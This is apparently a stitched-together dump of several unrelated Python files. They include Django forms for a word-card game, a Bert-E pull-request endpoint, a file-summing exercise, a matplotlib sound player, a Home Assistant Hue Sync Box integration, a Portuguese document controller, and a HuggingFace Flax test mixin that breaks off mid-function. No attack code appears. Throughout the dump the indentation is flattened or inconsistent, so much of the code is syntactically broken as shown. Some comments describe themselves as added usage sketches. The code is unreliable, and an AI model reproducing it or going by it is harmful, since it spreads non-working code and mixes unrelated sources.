from django import forms
from .models import GameState, RoundState, Game, Player, WordCard, Sentence, PlayerName
import re
class GameStateForm(forms.ModelForm):
class Meta:
model = GameState
fields = ['name']
exclude = []
widgets = None
localized_fields = None
labels = {}
help_texts = {}
error_messages = {}
    def __init__(self, *args, **kwargs):
        super(GameStateForm, self).__init__(*args, **kwargs)
def is_valid(self):
return super(GameStateForm, self).is_valid()
def full_clean(self):
return super(GameStateForm, self).full_clean()
def clean_name(self):
name = self.cleaned_data.get("name", None)
return name
def clean(self):
return super(GameStateForm, self).clean()
def validate_unique(self):
return super(GameStateForm, self).validate_unique()
def save(self, commit=True):
return super(GameStateForm, self).save(commit)
class RoundStateForm(forms.ModelForm):
class Meta:
model = RoundState
fields = ['name']
exclude = []
widgets = None
localized_fields = None
labels = {}
help_texts = {}
error_messages = {}
    def __init__(self, *args, **kwargs):
        super(RoundStateForm, self).__init__(*args, **kwargs)
def is_valid(self):
return super(RoundStateForm, self).is_valid()
def full_clean(self):
return super(RoundStateForm, self).full_clean()
def clean_name(self):
name = self.cleaned_data.get("name", None)
return name
def clean(self):
return super(RoundStateForm, self).clean()
def validate_unique(self):
return super(RoundStateForm, self).validate_unique()
def save(self, commit=True):
return super(RoundStateForm, self).save(commit)
class GameForm(forms.ModelForm):
class Meta:
model = Game
fields = ['game_code', 'name', 'players', 'maxPlayers', 'round', 'maxRounds', 'waitSeconds', 'gameState', 'roundState']
exclude = []
widgets = None
localized_fields = None
labels = {}
help_texts = {}
error_messages = {}
    def __init__(self, *args, **kwargs):
        super(GameForm, self).__init__(*args, **kwargs)
def is_valid(self):
return super(GameForm, self).is_valid()
def full_clean(self):
return super(GameForm, self).full_clean()
def clean_game_code(self):
game_code = self.cleaned_data.get("game_code", None)
return game_code
def clean_name(self):
name = self.cleaned_data.get("name", None)
return name
def clean_players(self):
players = self.cleaned_data.get("players", None)
return players
def clean_maxPlayers(self):
maxPlayers = self.cleaned_data.get("maxPlayers", None)
return maxPlayers
def clean_round(self):
round = self.cleaned_data.get("round", None)
return round
def clean_maxRounds(self):
maxRounds = self.cleaned_data.get("maxRounds", None)
return maxRounds
def clean_waitSeconds(self):
waitSeconds = self.cleaned_data.get("waitSeconds", None)
return waitSeconds
def clean_gameState(self):
gameState = self.cleaned_data.get("gameState", None)
return gameState
def clean_roundState(self):
roundState = self.cleaned_data.get("roundState", None)
return roundState
def clean(self):
return super(GameForm, self).clean()
def validate_unique(self):
return super(GameForm, self).validate_unique()
def save(self, commit=True):
return super(GameForm, self).save(commit)
class PlayerForm(forms.ModelForm):
class Meta:
model = Player
fields = ['name', 'playerPosition', 'playing', 'points', 'game', 'playerState']
exclude = []
widgets = None
localized_fields = None
labels = {}
help_texts = {}
error_messages = {}
    def __init__(self, *args, **kwargs):
        super(PlayerForm, self).__init__(*args, **kwargs)
def is_valid(self):
return super(PlayerForm, self).is_valid()
def full_clean(self):
return super(PlayerForm, self).full_clean()
def clean_name(self):
name = self.cleaned_data.get("name", None)
return name
def clean_playerPosition(self):
playerPosition = self.cleaned_data.get("playerPosition", None)
return playerPosition
def clean_playing(self):
playing = self.cleaned_data.get("playing", None)
return playing
def clean_points(self):
points = self.cleaned_data.get("points", None)
return points
def clean_game(self):
game = self.cleaned_data.get("game", None)
return game
def clean_playerState(self):
playerState = self.cleaned_data.get("playerState", None)
return playerState
def clean(self):
return super(PlayerForm, self).clean()
def validate_unique(self):
return super(PlayerForm, self).validate_unique()
def save(self, commit=True):
return super(PlayerForm, self).save(commit)
class WordCardForm(forms.ModelForm):
class Meta:
model = WordCard
fields = ['content', 'deckNumber', 'used', 'game', 'createdBy', 'onPlayerHand']
exclude = []
widgets = None
localized_fields = None
labels = {}
help_texts = {}
error_messages = {}
    def __init__(self, *args, **kwargs):
        super(WordCardForm, self).__init__(*args, **kwargs)
def is_valid(self):
return super(WordCardForm, self).is_valid()
def full_clean(self):
return super(WordCardForm, self).full_clean()
def clean_content(self):
content = self.cleaned_data.get("content", None)
return content
def clean_deckNumber(self):
deckNumber = self.cleaned_data.get("deckNumber", None)
return deckNumber
def clean_used(self):
used = self.cleaned_data.get("used", None)
return used
def clean_game(self):
game = self.cleaned_data.get("game", None)
return game
def clean_createdBy(self):
createdBy = self.cleaned_data.get("createdBy", None)
return createdBy
def clean_onPlayerHand(self):
onPlayerHand = self.cleaned_data.get("onPlayerHand", None)
return onPlayerHand
def clean(self):
return super(WordCardForm, self).clean()
def validate_unique(self):
return super(WordCardForm, self).validate_unique()
def save(self, commit=True):
return super(WordCardForm, self).save(commit)
class SentenceForm(forms.ModelForm):
class Meta:
model = Sentence
fields = ['content', 'valid', 'reject', 'game', 'createdBy']
exclude = []
widgets = None
localized_fields = None
labels = {}
help_texts = {}
error_messages = {}
    def __init__(self, *args, **kwargs):
        super(SentenceForm, self).__init__(*args, **kwargs)
def is_valid(self):
return super(SentenceForm, self).is_valid()
def full_clean(self):
return super(SentenceForm, self).full_clean()
def clean_content(self):
content = self.cleaned_data.get("content", None)
return content
def clean_valid(self):
valid = self.cleaned_data.get("valid", None)
return valid
def clean_reject(self):
reject = self.cleaned_data.get("reject", None)
return reject
def clean_game(self):
game = self.cleaned_data.get("game", None)
return game
def clean_createdBy(self):
createdBy = self.cleaned_data.get("createdBy", None)
return createdBy
def clean(self):
return super(SentenceForm, self).clean()
def validate_unique(self):
return super(SentenceForm, self).validate_unique()
def save(self, commit=True):
return super(SentenceForm, self).save(commit)
class UserNameForm(forms.ModelForm):
class Meta:
model = Player
fields = ['name',]
exclude = []
widgets = None
localized_fields = None
labels = {}
help_texts = {}
error_messages = {}
def __init__(self, *args, **kwargs):
self.game_inst = kwargs.pop('game_inst', None)
super(UserNameForm, self).__init__(*args, **kwargs)
def clean_name(self):
name = self.cleaned_data.get("name", None)
        if Player.objects.filter(game=self.game_inst, name=name).exists():
raise forms.ValidationError(
'Name \'%(value)s\' is already in use by another player in this game. Please pick another name.',
code='already-used',
params={'value': name},
)
else:
return name
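# Usage sketch (not part of the original module; the view and lookup below are hypothetical):
# a view would pass the current Game instance via the extra `game_inst` kwarg so that
# clean_name() can enforce per-game uniqueness of player names.
#
#     def join_game(request, game_code):
#         game = Game.objects.get(game_code=game_code)
#         form = UserNameForm(request.POST or None, game_inst=game)
#         if form.is_valid():
#             player = form.save(commit=False)
#             player.game = game
#             player.save()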
class AddWordCardsForm(forms.Form):
word_collection = forms.CharField(widget=forms.Textarea(attrs={'id': 'textArea', 'rows': 5, 'cols': 100}),help_text="Enter words that you want to use for the game")
def clean_word_collection(self):
return self.cleaned_data.get("word_collection", '')
class AddSentenceForm(forms.Form):
sentence_proposal = forms.CharField(required=False, widget=forms.Textarea(attrs={'rows': 2, 'cols': 100}),help_text="Enter the sentence that you want to commit")
def clean_sentence_proposal(self):
return self.cleaned_data.get("sentence_proposal", '')
|
# Copyright 2016-2018 Scality
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask_wtf import FlaskForm
from wtforms import IntegerField
from wtforms.validators import DataRequired, NumberRange
from bert_e.jobs.eval_pull_request import EvalPullRequestJob
from .base import APIEndpoint, APIForm
class PullRequestForm(FlaskForm):
pr_id = IntegerField(
'pr id', validators=[DataRequired(), NumberRange(min=1)])
class EvalPullRequest(APIEndpoint):
rule = '/pull-requests/<int:pr_id>'
method = 'POST'
admin = False
job = EvalPullRequestJob
@staticmethod
def validate_endpoint_data(pr_id, json):
if pr_id < 1:
raise ValueError()
class EvalPullRequestForm(APIForm):
doc = '/pull-requests/pr_id'
endpoint_cls = EvalPullRequest
form_cls = PullRequestForm
title = 'Evaluate a pull request'
help_text = '''
    <p>Create a job that will evaluate a single pull request and attempt
    to merge it.</p>
'''
form_inner_html = '''
<input id="pr_id" name="pr_id" placeholder="pull request id"
class="form-control" required>
<button type="submit" class="btn btn-outline-danger
btn-block">evaluate</button>
'''
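# Usage sketch (assumption, not part of Bert-E itself): the endpoint above accepts a POST on
# the rule '/pull-requests/<int:pr_id>'. Assuming the web app is reachable at a hypothetical
# BASE_URL and the API is mounted at the application root, a client call could look like:
#
#     import requests
#     BASE_URL = "http://bert-e.example.com"   # hypothetical host
#     response = requests.post(f"{BASE_URL}/pull-requests/1234")
#     response.raise_for_status()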
|
##
# This program reads a file of data values and computes their sum.
# If the file doesn't exist or has the wrong format, the user can specify another file.
#
import re
def main() :
done = False
while not done :
try :
            filename = input("Please enter the file name: ")
            if not filename.endswith(".txt"):   ##### Check that the file is a .txt file before reading it
                raise ValueError()              ##### Raise an exception if the file has the wrong format
            data = readFile(filename)
            # As an example for processing the data, we compute the sum.
            total = 0
            for value in data :
                total = total + value
            print("The sum is", total)
            done = True
except IOError : ##### Checks if a FileNotFoundError raises
print("Error: file not found.")
except ValueError :
print("Error: wrong file format.")
except RuntimeError as error :
print("Error:", str(error))
## Opens a file and reads a data set.
# @param filename the name of the file holding the data
# @return a list containing the data in the file
#
def readFile(filename) :
with open(filename, "r") as inFile:
return readData(inFile)
## Reads a data set.
# @param inFile the input file containing the data
# @return the data set in a list
#
def readData(inFile) :
data = []
for line in inFile:
value = re.sub(r'[^0-9]', '', str(line)) ##### Removes all non-numbers from the file
value = int(value) # May raise a ValueError exception.
data.append(value)
return data
# Start the program.
main()
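# Worked example (illustrative): readData() strips every non-digit character from a line
# before converting it, so an input file containing the lines
#     3
#     1 4
#     15
# yields [3, 14, 15] and main() reports "The sum is 32".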
|
import random
from player import Player
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider, Button, RadioButtons
from matplotlib.animation import FuncAnimation
def dist(a, b):
values = []
for _a, _b in zip(a, b):
if _a is not None and _b is not None:
values.append(abs(_a-_b))
if len(values) > 0:
return sum(values)/len(values)
return 0
def set_list(lines, row):
return sorted(list(set(line[row] for line in lines)))
def choice(l, normalize=True):
def _choice(v):
try:
return l.index(v)/(len(l)-1 if normalize else 1)
except ValueError:
return -1
return _choice
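# Worked examples (illustrative) for the helpers above:
#   dist([0.5, None, 0.2], [0.2, 0.9, 0.2])  -> mean of |0.5-0.2| and |0.2-0.2| = 0.15
#   choice(["a", "b", "c"])("b")             -> index 1 normalized to 1/(3-1) = 0.5
#   choice(["a", "b", "c"])("missing")       -> -1 (value not found in the list)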
class SoundScape(object):
def __init__(self, data):
self.data = data
self.pos = []
self.vectors = []
self.active = set()
self.closest = None
self.pickup_range = data.get("pickup_range", 0.2)
self.sliders = []
self.radios = []
self.fig = plt.figure(figsize=(10, 4))
with open(data["info_file"]) as f:
lines = [line.split(data["delimiter"]) for line in f.readlines()]
self.mappings = []
for i, dim in enumerate(data["dimensions"]):
t = dim["type"]
row = dim["row"]
self.pos.append(dim.get("default", 0))
if t == "radio":
c = dim.get("choices", set_list(lines, row))
print(c)
self.mappings.append(choice(c))
wpos = [len(self.radios)*.16, 0.5, 0.15, .5]
ax = plt.axes(wpos)
radio = RadioButtons(ax, c, active=0)
radio.on_clicked(self.update_function(i))
self.radios.append(radio)
elif t == "float":
self.mappings.append(float)
wpos = [.2, len(self.sliders)*.10, .5, .1]
ax = plt.axes(wpos)
slider = Slider(ax, dim["name"], 0, 1, valinit=0)
slider.on_changed(self.update_function(i))
self.sliders.append(slider)
elif t == "len":
self.mappings.append(len)
wpos = [.2, len(self.sliders)*.10, .5, .1]
ax = plt.axes(wpos)
                slider = Slider(ax, dim["name"], 0, 1, valinit=0)
slider.on_changed(self.update_function(i))
self.sliders.append(slider)
for line in lines:
dim_values = []
for i, dim in enumerate(data["dimensions"]):
dim_values.append(self.mappings[i](line[dim["row"]]))
self.vectors.append((
data["root_folder"] + line[data["path_row"]],
*dim_values
))
self.update_position()
def update_function(self, i):
def _update(v):
self.pos[i] = self.mappings[i](v)
self.update_position()
return _update
def update_position(self):
self.active = set()
closest = None
for path, *v in self.vectors:
d = dist(self.pos, v)
if d < self.pickup_range:
self.active.add((path, d, *v))
if closest is None or closest[1] > d:
closest = (path, d, *v)
self.closest = closest
def volume(self, d):
l = 1 - d*(1/self.pickup_range)
return l, l
def play(self):
player = Player()
pickup_range = self.data["pickup_range"]
delay = self.data.get("delay", 10)
def update(t):
if len(self.active) > 0:
                path, d, *v = random.choice(tuple(self.active))
player.fire(path, volume=self.volume(d))
animation = FuncAnimation(self.fig, update, interval=delay)
plt.show()
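# Usage sketch (the file names and column indices below are hypothetical). These are the keys
# the constructor above actually reads from the `data` dict:
#
#     config = {
#         "info_file": "sounds.csv",      # one line per sound, columns split by `delimiter`
#         "delimiter": ",",
#         "root_folder": "sounds/",
#         "path_row": 0,                  # column holding the relative audio file path
#         "pickup_range": 0.2,
#         "delay": 10,
#         "dimensions": [
#             {"type": "radio", "row": 1, "name": "category", "default": 0},
#             {"type": "float", "row": 2, "name": "pitch", "default": 0.0},
#         ],
#     }
#     SoundScape(config).play()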
|
"""Support of Philips Hue Play HDMI Sync Box as mediaplayer"""
import asyncio
from datetime import timedelta
import textwrap
import aiohuesyncbox
import async_timeout
from homeassistant.components.light import ATTR_BRIGHTNESS, ATTR_BRIGHTNESS_STEP
from homeassistant.components.media_player import MediaPlayerEntity
from homeassistant.components.media_player.const import (
MEDIA_TYPE_MUSIC,
SUPPORT_NEXT_TRACK,
SUPPORT_PAUSE,
SUPPORT_PLAY,
SUPPORT_PREVIOUS_TRACK,
SUPPORT_SELECT_SOUND_MODE,
SUPPORT_SELECT_SOURCE,
SUPPORT_STOP,
SUPPORT_TURN_OFF,
SUPPORT_TURN_ON,
SUPPORT_VOLUME_SET,
)
from homeassistant.const import STATE_IDLE, STATE_OFF, STATE_PLAYING
from .const import (
ATTR_ENTERTAINMENT_AREA,
ATTR_INPUT,
ATTR_INPUT_NEXT,
ATTR_INPUT_PREV,
ATTR_INTENSITY,
ATTR_INTENSITY_NEXT,
ATTR_INTENSITY_PREV,
ATTR_MODE,
ATTR_MODE_NEXT,
ATTR_MODE_PREV,
ATTR_SYNC,
ATTR_SYNC_TOGGLE,
DOMAIN,
INTENSITIES,
LOGGER,
MODES,
)
from .helpers import log_config_entry, redacted
from .huesyncbox import (
PhilipsHuePlayHdmiSyncBox,
async_retry_if_someone_else_is_syncing,
)
SUPPORT_HUESYNCBOX = (
SUPPORT_TURN_ON
| SUPPORT_TURN_OFF
| SUPPORT_SELECT_SOURCE
| SUPPORT_PLAY
| SUPPORT_PAUSE
| SUPPORT_STOP
| SUPPORT_VOLUME_SET
| SUPPORT_SELECT_SOUND_MODE
| SUPPORT_PREVIOUS_TRACK
| SUPPORT_NEXT_TRACK
)
SCAN_INTERVAL = timedelta(seconds=2)
MAX_BRIGHTNESS = 200
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Setup from configuration.yaml, not supported, only through integration."""
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Setup from config_entry."""
LOGGER.debug(
"%s async_setup_entry\nconfig_entry:\n%s\nhass.data\n%s",
__name__,
textwrap.indent(log_config_entry(config_entry), " "),
[redacted(v) for v in hass.data[DOMAIN].keys()],
)
entity = HueSyncBoxMediaPlayerEntity(
hass.data[DOMAIN][config_entry.data["unique_id"]]
)
async_add_entities([entity], update_before_add=True)
async def async_unload_entry(hass, config_entry):
"""Unload entity"""
# Not sure what to do, entities seem to disappear by themselves
# No other de-initialization seems needed
class HueSyncBoxMediaPlayerEntity(MediaPlayerEntity):
"""Representation of a HueSyncBox as mediaplayer."""
def __init__(self, huesyncbox: PhilipsHuePlayHdmiSyncBox) -> None:
self._huesyncbox = huesyncbox
self._available = False
huesyncbox.entity = self
@property
def device_info(self):
"""Return the device info."""
# Only return the identifiers so the entry gets linked properly
# Managing deviceinfo is done elsewhere
return {
"identifiers": {(DOMAIN, self._huesyncbox.api.device.unique_id)},
}
async def async_update(self):
"""Update the entity"""
try:
with async_timeout.timeout(5):
# Since we need to update multiple endpoints just update all in one call
old_device = self._huesyncbox.api.device
await self._huesyncbox.api.update()
if old_device != self._huesyncbox.api.device:
await self._huesyncbox.async_update_registered_device_info()
self._available = True
except (asyncio.TimeoutError, aiohuesyncbox.AiohuesyncboxException):
self._available = False
@property
def unique_id(self):
"""Return the uniqueid of the entity."""
return self._huesyncbox.api.device.unique_id
@property
def available(self):
"""Return if the device is available or not."""
return self._available
@property
def name(self):
"""Return the name of the entity."""
return self._huesyncbox.api.device.name
@property
def supported_features(self):
"""Flag of media commands that are supported."""
supported_commands = SUPPORT_HUESYNCBOX
return supported_commands
@property
def state(self):
"""Return the state of the entity."""
state = STATE_PLAYING
device_state = self._huesyncbox.api.execution.mode
if device_state == "powersave":
state = STATE_OFF
if device_state == "passthrough":
state = STATE_IDLE
return state
async def async_turn_off(self):
"""Turn off media player."""
await self._huesyncbox.api.execution.set_state(mode="powersave")
async def async_turn_on(self):
"""Turn the media player on."""
await self._huesyncbox.api.execution.set_state(mode="passthrough")
async def async_media_play(self):
"""Send play command."""
await async_retry_if_someone_else_is_syncing(
self._huesyncbox,
lambda: self._huesyncbox.api.execution.set_state(sync_active=True),
)
async def async_media_pause(self):
"""Send pause command."""
        # The syncbox does not really have "pause", but the default media player
        # card does not work when the media player only supports Stop,
        # so let's implement pause for now to work around that.
await self.async_media_stop()
async def async_media_stop(self):
"""Send stop command."""
await self._huesyncbox.api.execution.set_state(sync_active=False)
@property
def source(self):
"""Return the current input source."""
selected_source = self._huesyncbox.api.execution.hdmi_source
for input_ in self._huesyncbox.api.hdmi.inputs:
if input_.id == selected_source:
return input_.name
@property
def source_list(self):
"""List of available input sources."""
sources = []
for input_ in self._huesyncbox.api.hdmi.inputs:
sources.append(input_.name)
return sorted(sources)
async def async_select_source(self, source):
"""Select input source."""
        # Source is the user-given name, so it needs to be mapped back to a valid API value.
for input_ in self._huesyncbox.api.hdmi.inputs:
if input_.name == source:
await self._huesyncbox.api.execution.set_state(hdmi_source=input_.id)
break
@staticmethod
def get_hue_target_from_id(id_: str):
"""Determine API target from id"""
try:
return f"groups/{int(id_)}"
except ValueError:
return id_
async def async_select_entertainment_area(self, area_name):
"""Select entertainmentarea."""
# Area is the user given name, so needs to be mapped back to a valid API value."""
group = self._get_group_from_area_name(area_name)
if group:
await self._huesyncbox.api.execution.set_state(
hue_target=self.get_hue_target_from_id(group.id)
)
def _get_group_from_area_name(self, area_name):
"""Get the group object by entertainment area name."""
for group in self._huesyncbox.api.hue.groups:
if group.name == area_name:
return group
return None
def _get_entertainment_areas(self):
"""List of available entertainment areas."""
areas = []
for group in self._huesyncbox.api.hue.groups:
areas.append(group.name)
return sorted(areas)
def _get_selected_entertainment_area(self):
"""Return the name of the active entertainment area."""
hue_target = (
self._huesyncbox.api.execution.hue_target
) # note that this is a string like "groups/123"
selected_area = None
try:
id_ = hue_target.replace("groups/", "")
for group in self._huesyncbox.api.hue.groups:
if group.id == id_:
selected_area = group.name
break
except KeyError:
LOGGER.warning("Selected entertainment area not available in groups")
return selected_area
@property
def extra_state_attributes(self):
api = self._huesyncbox.api
mode = api.execution.mode
attributes = {
"mode": mode,
"entertainment_area_list": self._get_entertainment_areas(),
"entertainment_area": self._get_selected_entertainment_area(),
"bridge_unique_id": api.hue.bridge_unique_id,
"bridge_connection_state": api.hue.connection_state,
}
for index, input_ in enumerate(api.hdmi.inputs):
attributes[f"hdmi{index+1}_status"] = input_.status
if mode != "powersave":
attributes["brightness"] = self.scale(
api.execution.brightness, [0, MAX_BRIGHTNESS], [0, 1]
)
            if mode not in MODES:
mode = api.execution.last_sync_mode
attributes["intensity"] = getattr(api.execution, mode).intensity
return attributes
async def async_set_sync_state(self, sync_state):
"""Set sync state."""
# Special handling for Toggle specific mode as that cannot be done in 1 call on the API
sync_toggle = sync_state.get(ATTR_SYNC_TOGGLE, None)
mode = sync_state.get(ATTR_MODE, None)
if sync_toggle and mode:
if self._huesyncbox.api.execution.mode != mode:
# When not syncing in the desired mode, just turn on the desired mode, no toggle
sync_toggle = None
else:
# Otherwise just toggle, no mode (setting mode would interfere with the toggle)
mode = None
# Entertainment area
group = self._get_group_from_area_name(
sync_state.get(ATTR_ENTERTAINMENT_AREA, None)
)
hue_target = self.get_hue_target_from_id(group.id) if group else None
state = {
"sync_active": sync_state.get(ATTR_SYNC, None),
"sync_toggle": sync_toggle,
# "hdmi_active": ,
# "hdmi_active_toggle": None,
"mode": mode,
"mode_cycle": "next"
if ATTR_MODE_NEXT in sync_state
else "previous"
if ATTR_MODE_PREV in sync_state
else None,
"hdmi_source": sync_state.get(ATTR_INPUT, None),
"hdmi_source_cycle": "next"
if ATTR_INPUT_NEXT in sync_state
else "previous"
if ATTR_INPUT_PREV in sync_state
else None,
"brightness": int(
self.scale(sync_state[ATTR_BRIGHTNESS], [0, 1], [0, MAX_BRIGHTNESS])
)
if ATTR_BRIGHTNESS in sync_state
else None,
"brightness_step": int(
self.scale(
sync_state[ATTR_BRIGHTNESS_STEP],
[-1, 1],
[-MAX_BRIGHTNESS, MAX_BRIGHTNESS],
)
)
if ATTR_BRIGHTNESS_STEP in sync_state
else None,
"intensity": sync_state.get(ATTR_INTENSITY, None),
"intensity_cycle": "next"
if ATTR_INTENSITY_NEXT in sync_state
else "previous"
if ATTR_INTENSITY_PREV in sync_state
else None,
"hue_target": hue_target,
}
try:
await async_retry_if_someone_else_is_syncing(
self._huesyncbox,
lambda: self._huesyncbox.api.execution.set_state(**state),
)
except aiohuesyncbox.RequestError as ex:
if "13: Invalid Key" in ex.args[0]:
# Clarify this specific case as people will run into it
# Use a warning so it is visually separated from the actual error
LOGGER.warning(
"This error most likely occured because the service call resulted in an empty message to the syncbox. Make sure that the selected options would result in an action on the syncbox (e.g. requesting only `sync_toggle:false` would cause such an error)."
)
raise
async def async_set_sync_mode(self, sync_mode):
"""Select sync mode."""
await async_retry_if_someone_else_is_syncing(
self._huesyncbox,
lambda: self._huesyncbox.api.execution.set_state(mode=sync_mode),
)
async def async_set_intensity(self, intensity, mode):
"""Set intensity for sync mode."""
if mode is None:
mode = self.get_mode()
# Intensity is per mode so update accordingly
state = {mode: {"intensity": intensity}}
await self._huesyncbox.api.execution.set_state(**state)
async def async_set_brightness(self, brightness):
"""Set brightness"""
api_brightness = self.scale(brightness, [0, 1], [0, MAX_BRIGHTNESS])
await self._huesyncbox.api.execution.set_state(brightness=api_brightness)
async def async_set_bridge(self, bridge_id, username, clientkey):
"""
Set bridge, note that this change is not instant.
After calling you will have to wait until the `bridge_unique_id` matches the new bridge id
and the bridge_connection_state is `connected`, `invalidgroup` or `streaming`, other status means it is connecting.
I have seen the bridge change to take around 15 seconds.
"""
await self._huesyncbox.api.hue.set_bridge(bridge_id, username, clientkey)
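    # Illustrative only (not part of the integration): a caller that switches bridges could
    # poll the attributes exposed above until the new bridge reports a usable state.
    #
    #     await entity.async_set_bridge(new_id, username, clientkey)
    #     while True:
    #         attrs = entity.extra_state_attributes
    #         if (attrs["bridge_unique_id"] == new_id and
    #                 attrs["bridge_connection_state"] in ("connected", "invalidgroup", "streaming")):
    #             break
    #         await asyncio.sleep(1)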
def get_mode(self):
"""Get mode"""
mode = self._huesyncbox.api.execution.mode
        if mode not in MODES:
mode = self._huesyncbox.api.execution.last_sync_mode
return mode
@staticmethod
def scale(input_value, input_range, output_range):
"""Scale value from one range to another"""
input_min = input_range[0]
input_max = input_range[1]
input_spread = input_max - input_min
output_min = output_range[0]
output_max = output_range[1]
output_spread = output_max - output_min
value_scaled = float(input_value - input_min) / float(input_spread)
return output_min + (value_scaled * output_spread)
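    # Worked example: scale(100, [0, MAX_BRIGHTNESS], [0, 1]) maps the API brightness 100
    # (out of 200) to 0.5, and scale(0.5, [0, 1], [0, MAX_BRIGHTNESS]) maps it back to 100.0.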
# Below properties and methods are temporary to get a "free" UI with the mediaplayer card
@property
def volume_level(self):
"""Volume level of the media player (0..1) is mapped brightness for free UI."""
return self.scale(
self._huesyncbox.api.execution.brightness, [0, MAX_BRIGHTNESS], [0, 1]
)
async def async_set_volume_level(self, volume):
"""Set volume level of the media player (0..1), abuse to control brightness for free UI."""
await self.async_set_brightness(volume)
@property
def sound_mode(self):
"""Return the current sound mode (actually intensity)."""
attributes = self.extra_state_attributes
if "intensity" in attributes:
return attributes["intensity"]
return None
@property
def sound_mode_list(self):
"""List of available soundmodes / intensities."""
return INTENSITIES
async def async_select_sound_mode(self, sound_mode):
"""Select sound mode, abuse for intensity to get free UI."""
await self.async_set_intensity(sound_mode, None)
@property
def media_content_type(self):
"""Content type of current playing media."""
# Pretend we are playing music to expose additional data (e.g. mode and intensity) to the player
return MEDIA_TYPE_MUSIC
@property
def media_title(self):
"""Title of current playing media, abuse to disaplay mode + intensity for free UI."""
return f"{self.get_mode().capitalize()} - {self.sound_mode.capitalize()}"
@property
def media_artist(self):
"""Title of current playing media, abuse to display current source so I have a free UI."""
return self.source
async def async_media_previous_track(self):
"""Send previous track command, abuse to cycle modes for now."""
await self._huesyncbox.api.execution.cycle_sync_mode(False)
async def async_media_next_track(self):
"""Send next track command, abuse to cycle modes for now."""
await self._huesyncbox.api.execution.cycle_sync_mode(True)
|
from model.creator.creator import Creator
from datetime import date
class DocumentoController:
def __init__(self):
pass
@staticmethod
def getDocumento(nome, caminho, tipo, data):
        try:
            with open(caminho, "r"):
                pass  # only verify that the file exists and can be opened
        except FileNotFoundError:
            raise FileNotFoundError('Arquivo não encontrado')
try:
dia, mes, ano = map(int, data.split('/'))
data = date(ano, mes, dia)
except ValueError:
raise ValueError("Formato da data inválido")
if data > date.today():
raise ValueError("Data inválida")
return Creator().newDocumento(nome, caminho, tipo, data)
@staticmethod
def readDocumento(nome=None, caminho=None, tipo=None, data=None):
return Creator().newDocumento(nome, caminho, tipo, data)
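# Usage sketch (the path and date below are hypothetical): getDocumento() checks that the
# file exists and that the date is a valid, non-future 'dd/mm/yyyy' date before delegating
# to Creator.newDocumento.
#
#     doc = DocumentoController.getDocumento(
#         "relatorio", "/tmp/relatorio.txt", "txt", "01/05/2020"
#     )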
|
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import inspect
import random
import tempfile
import unittest
from typing import List, Tuple
import numpy as np
import transformers
from huggingface_hub import HfApi
from requests.exceptions import HTTPError
from transformers import BertConfig, is_flax_available, is_torch_available
from transformers.models.auto import get_values
from transformers.testing_utils import (
ENDPOINT_STAGING,
PASS,
USER,
CaptureLogger,
is_pt_flax_cross_test,
is_staging_test,
require_flax,
slow,
)
from transformers.utils import logging
if is_flax_available():
import os
import jax
import jax.numpy as jnp
from flax.core.frozen_dict import unfreeze
from flax.traverse_util import flatten_dict
from transformers import (
FLAX_MODEL_FOR_QUESTION_ANSWERING_MAPPING,
FLAX_MODEL_FOR_SEQUENCE_CLASSIFICATION_MAPPING,
FLAX_MODEL_MAPPING,
FlaxAutoModelForSequenceClassification,
FlaxBertModel,
)
from transformers.modeling_flax_pytorch_utils import (
convert_pytorch_state_dict_to_flax,
load_flax_weights_in_pytorch_model,
)
os.environ["XLA_PYTHON_CLIENT_MEM_FRACTION"] = "0.12" # assumed parallelism: 8
if is_torch_available():
import torch
def _config_zero_init(config):
configs_no_init = copy.deepcopy(config)
for key in configs_no_init.__dict__.keys():
if "_range" in key or "_std" in key or "initializer_factor" in key:
setattr(configs_no_init, key, 1e-10)
return configs_no_init
def ids_tensor(shape, vocab_size, rng=None):
"""Creates a random int32 tensor of the shape within the vocab size."""
if rng is None:
rng = random.Random()
total_dims = 1
for dim in shape:
total_dims *= dim
values = []
for _ in range(total_dims):
values.append(rng.randint(0, vocab_size - 1))
output = np.array(values, dtype=jnp.int32).reshape(shape)
return output
def floats_tensor(shape, scale=1.0, rng=None, name=None):
"""Creates a random float32 tensor"""
if rng is None:
rng = random.Random()
total_dims = 1
for dim in shape:
total_dims *= dim
values = []
for _ in range(total_dims):
values.append(rng.random() * scale)
return np.array(values, dtype=jnp.float32).reshape(shape)
def random_attention_mask(shape, rng=None):
attn_mask = ids_tensor(shape, vocab_size=2, rng=rng)
# make sure that at least one token is attended to for each batch
attn_mask[:, -1] = 1
return attn_mask
@require_flax
class FlaxModelTesterMixin:
model_tester = None
all_model_classes = ()
is_encoder_decoder = False
def _prepare_for_class(self, inputs_dict, model_class):
inputs_dict = copy.deepcopy(inputs_dict)
# hack for now until we have AutoModel classes
if "ForMultipleChoice" in model_class.__name__:
inputs_dict = {
k: jnp.broadcast_to(v[:, None], (v.shape[0], self.model_tester.num_choices, v.shape[-1]))
if isinstance(v, (jnp.ndarray, np.ndarray))
else v
for k, v in inputs_dict.items()
}
return inputs_dict
def assert_almost_equals(self, a: np.ndarray, b: np.ndarray, tol: float):
diff = np.abs((a - b)).max()
self.assertLessEqual(diff, tol, f"Difference between torch and flax is {diff} (>= {tol}).")
def test_model_outputs_equivalence(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
def set_nan_tensor_to_zero(t):
t[t != t] = 0
return t
def check_equivalence(model, tuple_inputs, dict_inputs, additional_kwargs={}):
tuple_output = model(**tuple_inputs, return_dict=False, **additional_kwargs)
dict_output = model(**dict_inputs, return_dict=True, **additional_kwargs).to_tuple()
def recursive_check(tuple_object, dict_object):
if isinstance(tuple_object, (List, Tuple)):
